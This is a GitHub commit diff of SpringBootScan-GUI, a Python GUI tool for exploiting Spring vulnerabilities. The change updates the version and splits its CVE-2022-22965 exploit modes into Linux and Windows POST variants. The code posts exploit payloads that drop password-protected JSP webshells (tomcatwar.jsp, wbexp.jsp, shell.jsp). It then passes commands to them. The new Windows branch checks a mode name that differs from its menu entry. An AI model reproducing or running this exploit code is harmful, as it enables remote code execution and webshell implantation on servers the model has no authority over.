@@ -28,7 +28,7 @@ def __init__(self):
28
28
\$$ \$$$$$$
29
29
______
30
30
/ \
31
- | $$$$$$\ _______ ______ _______ SpringBootScan-GUI Version: 1.2
31
+ | $$$$$$\ _______ ______ _______ SpringBootScan-GUI Version: 1.2.1
32
32
| $$___\$$ / \| \ | \ +----------------------------------+
33
33
\$$ \ | $$$$$$$ \$$$$$$\| $$$$$$$\ + 图形化 by: →13exp← +
34
34
_\$$$$$$\| $$ / $$| $$ | $$ + https://github.com/13exp/ +
@@ -46,7 +46,7 @@ def __init__(self):
46
46
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27" ,
47
47
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20130406 Firefox/23.0" ,
48
48
"Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00" )
49
- cves = ("CVE-2022-22965" ,"CVE-2022-22963" ,"CVE-2022-22947" ,"22965-13exp-shell" ,"22965-aabyss-shell -post" ,"22965-aabyss-shell-get" )
49
+ cves = ("CVE-2022-22965" ,"CVE-2022-22963" ,"CVE-2022-22947" ,"22965-13exp-shell" ,"22965-aabyss-linux-post" , "22965-aabyss-win -post" ,"22965-aabyss-shell-get" )
50
50
no_proxies = []
51
51
proxy_list = []
52
52
self .root = tk .Tk ()
@@ -677,18 +677,20 @@ def CVE_2022_22965_aabysszg(self, url, proxies):
677
677
try :
678
678
requests .packages .urllib3 .disable_warnings ()
679
679
if proxies != "" :
680
- if Vule == "22965-aabyss-shell -post" :
680
+ if Vule == "22965-aabyss-linux -post" :
681
681
requests .post (url , headers = Headers_1 , data = data1 , timeout = 6 , allow_redirects = False , verify = False , proxies = proxies )
682
682
sleep (1 )
683
+ elif Vule == "22965-aabyss-win-get" :
683
684
requests .post (url , headers = Headers_1 , data = data2 , timeout = 6 , allow_redirects = False , verify = False , proxies = proxies )
684
685
sleep (1 )
685
686
elif Vule == "22965-aabyss-shell-get" :
686
687
requests .get (getpayload , headers = Headers_1 , timeout = 6 , allow_redirects = False , verify = False , proxies = proxies )
687
688
sleep (1 )
688
689
else :
689
- if Vule == "22965-aabyss-shell -post" :
690
+ if Vule == "22965-aabyss-linux -post" :
690
691
requests .post (url , headers = Headers_1 , data = data1 , timeout = 6 , allow_redirects = False , verify = False )
691
692
sleep (1 )
693
+ elif Vule == "22965-aabyss-win-get" :
692
694
requests .post (url , headers = Headers_1 , data = data2 , timeout = 6 , allow_redirects = False , verify = False )
693
695
sleep (1 )
694
696
elif Vule == "22965-aabyss-shell-get" :
@@ -838,7 +840,7 @@ def cve_2022_22965_exec(self):
838
840
cmd = self .reverse_tcp .get ()
839
841
if self .CVEs .get () == 'CVE-2022-22965' :
840
842
url_shell = url + "shell.jsp?cmd={}" .format (cmd )
841
- elif '22965-aabyss-shell ' in self .CVEs .get ():
843
+ elif '22965-aabyss' in self .CVEs .get ():
842
844
url_shell = url + "tomcatwar.jsp?pwd=aabysszg&cmd={}" .format (cmd )
843
845
elif self .CVEs .get () == '22965-13exp-shell' :
844
846
url_shell = url + "wbexp.jsp?pwd=13exp&cmd={}" .format (cmd )
@@ -1034,7 +1036,7 @@ def Vule(self):
1034
1036
self .CVE_2022_22963 (i , proxies ,execcmd )
1035
1037
elif Vule == "CVE-2022-22947" :
1036
1038
self .CVE_2022_22947 (i , proxies ,execcmd )
1037
- elif "22965-aabyss-shell " in Vule :
1039
+ elif "22965-aabyss" in Vule :
1038
1040
self .CVE_2022_22965_aabysszg (i , proxies )
1039
1041
1040
1042
else :
@@ -1056,7 +1058,7 @@ def Vule(self):
1056
1058
messagebox .showinfo ("提示" ,"执行命令不能为空,请重试!" )
1057
1059
else :
1058
1060
self .CVE_2022_22947 (url , proxies ,execcmd )
1059
- elif "22965-aabyss-shell " in Vule :
1061
+ elif "22965-aabyss" in Vule :
1060
1062
back = self .CVE_2022_22965_aabysszg (url , proxies )
1061
1063
if "[-]" in back :
1062
1064
back = "[+]执行二次验证中 等待5秒"
0 commit comments